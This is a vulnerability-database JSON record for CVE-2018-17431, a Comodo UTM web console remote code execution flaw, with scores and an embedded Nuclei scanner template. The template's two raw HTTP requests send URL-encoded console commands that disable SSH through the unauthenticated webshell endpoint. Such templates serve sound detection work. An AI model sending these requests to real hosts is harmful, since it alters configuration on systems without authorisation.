{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-17431/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-17431/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-17431/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-17431/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-17431/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-17431"},"sightings":{"href":"/api/v1/sightings/cve-2018-17431"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.83912,"kev":false,"percentile":0.99679},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-17431.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-17431\n\ninfo:\n  name: Comodo Unified Threat Management Web Console - Remote Code Execution\n  author: dwisiswant0\n  severity: critical\n  description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n  remediation: |\n    Apply the latest security patches or updates provided by Comodo to fix this vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/48825\n    - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-17431\n    - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437\n    - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-17431\n    cwe-id: CWE-287\n    epss-score: 0.83912\n    epss-percentile: 0.99679\n    cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: comodo\n    product: unified_threat_management_firewall\n  tags: cve,cve2018,comodo,rce,edb,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\n        Host: {{Hostname}}\n        Connection: close\n      - | # to triggering RCE\n        GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\n        Host: {{Hostname}}\n        Connection: close\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Configuration has been altered\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221009fc19ddc10e52c120a3349c0d68d0b44efa21ce7d33942b09d8d9d7d350ce2b8022100c79cd99a6a6a7988ff2f918581e8674ec5621dee1686d578a4c622a76f6dc60a:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2018-17431"}